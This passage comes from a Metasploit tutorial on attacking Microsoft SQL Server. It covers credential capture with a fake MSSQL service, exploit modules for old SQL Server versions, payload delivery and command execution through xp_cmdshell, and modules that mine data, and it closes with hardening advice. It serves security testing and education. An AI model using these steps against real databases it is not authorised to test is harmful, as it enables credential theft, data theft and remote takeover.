You can set CAINPWFILE option to store captured hashes in Cain&Abel format or JOHNPWFILE to store hashes in John The Ripper format. Leave SRVHOST option as it is, 0.0.0.0, to listen on the local host. You can configure the module to use SSL (Figure 24).

sql24

Figure 24. mssql capture module options

Run the module and connect to the capture mssql server from another computer on the network to see how it is working. To connect to a mssql server open your Microsoft SQL Server management studio and try to login to the running service (Figure 25). Metasploit has captured the username and the password the user entered to login to the fake MSSQL service.

 sql25

Figure 25. Login attempt captured by mssql capture module

Exploiting the Microsoft world

Metasploit offers some MSSQL exploits. Let’s take a look.

SQL Server 2000

SQL server 2000 is a very old version of Microsoft SQL Server and is hard to find it on Production environments nowdays. ms02_039_slammer exploits a resolution service buffer overflow. This overflow is triggered by sending a udp packet to port 1434 which starts with 0×04 and is followed by long string terminating with a colon and a number. To select it for use simply type:

use exploit/windows/mssql/ms02_039_slammer

Another exploit module for SQL Server 2000 is ms02_056_hello. ms02_056_hello is an exploit which will send malformed data to TCP port 1433 to overflow a buffer and possibly execute code on the server with SYSTEM level privileges. To select it, type:

use exploit/windows/mssql/ms02_056_hello

SQL Server 2000 – SQL Server 2005

ms09_004_sp_replwritetovarbin and ms09_004_sp_replwritetovarbin_sqli exploit a heap-based buffer overflow that occur when calling the undocumented “sp_replwritetovarbin” extended stored procedure. This vulnerability affects all versions of Microsoft SQL Server 2000 and 2005, Windows Internal Database, and Microsoft Desktop Engine without the updates supplied in MS09-004. Microsoft patched this vulnerability in SP3 for 2005. To use these exploits you type:

use exploit/windows/mssql/ms09_004_sp_replwritetovarbin

or

use exploit/windows/mssql/ms09_004_sp_replwritetovarbin_sqli

As with any Metasploit module, you can type

show options

to get a list of available options (Figure 26).

sql26

Figure 26. ms09_004_sp_replwritetovarbin_sqli module options

Type

show payloads

to get a list of available of payloads for the selected exploit.

SQL Server database systems

Metasploit offers the module, exploit/windows/mssql/mssql_payload, which executes an arbitrary payload on a Microsoft SQL Server by using the “xp_cmdshell” stored procedure. Three delivery methods are supported. The original method uses Windows ‘debug.com’. Since this method invokes ntvdm, it is not available on x86_64 systems. A second method takes advantage of the Command Stager subsystem. This allows using various techniques, such as using a TFTP server, to send the executable. By default the Command Stager uses ‘wcsript.exe’ to generate the executable on the target. Finally, ReL1K’s latest method utilizes PowerShell to transmit and recreate the payload on the target.

Another interesting exploit module that can be applied in all SQL Server versions is the exploit/windows/mssql/mssql_payload_sqli. This module will execute an arbitrary payload on a Microsoft SQL Server, using a SQL injection vulnerability. Once a vulnerability is identified this module will use xp_cmdshell to upload and execute Metasploit payloads. It is necessary to specify the exact point where the SQL injection vulnerability happens. You should use a “reverse” payload on port 80 or to any other outbound port allowed on the firewall.

From inside

Metasploit offers various modules that will assist you to enumerate a MSSQL service, execute sql queries, retrieve useful data and many more. All you need is a valid user-password pair. mssql_enum will perform a series of configuration audits and security checks against a Microsoft SQL Server database. mssql_sql and mssql_sql_file will allow for simple SQL statements to be executed against a MSSQL/MSDE or multiple SQL queries contained within a specified file. To select them, type:

use auxiliary/admin/mssql/mssql_enum

or

use auxiliary/admin/mssql/mssql_sql

or

use auxiliary/admin/mssql/mssql_sql_file

and execute the following command to see the options (Figure 27)

show options

sql27

Figure 27. mssql_sql_file module options

Sample Data

There is an amazing module called mssql_findandsampledata. This module will search through all of the non-default databases on the SQL Server for columns that match the keywords defined in the TSQL KEYWORDS option. If column names are found that match the defined keywords and data is present in the associated tables, the module will select a sample of the records from each of the affected tables. You have to set the the sample size by configuring the SAMPLE_SIZE option. Your results will be stored in CSV format. Type

use auxiliary/admin/mssql/mssql_findandsampledata

and

show options

Executing Windows Commands

If you have managed to find a valid username – password pair, the most desired thing that you would like to do is to execute a command on the compromised machine. Metasploit offers module auxiliary/admin/mssql/mssql_exec which will execute a Windows command on a MSSQL/MSDE instance via the xp_cmdshell procedure. All you need is the username and password!!

sql28

Figure 28. mssql_findandsampledata module options

Data mining

If you need to search for specific information in SQL Server databases there is a module that can make your life easier. Its name, mssql_idf, and you will find it under auxiliary/admin/mssql/. This module will search the specified MSSQL server for ‘interesting’ columns and data. The module is working against SQL Server 2005 and SQL Server 2008 (Figure 29).

 sql29

Figure 29. mssql_idf module options

Conclusion

Databases are the most important part of today’s computing systems. They usually contain all the information needed to run a company or organization. Therefore it is necessary to be as safe as possible. Metasploit framework is just one tool of many out there, that offers the appropriate scripts to compromise a database system. Databases are software that must be accessed by applications running on the Internet, that’s why they must be guarded by firewalls, use encryption and powerfull passwords and the whole system (database and operating system) must be checked every day for new updates and upgrades. The best choice would be to allow access to your database only from your intranet and/or vpn. Try not to expose your database directly to the web. Close all your database system ports now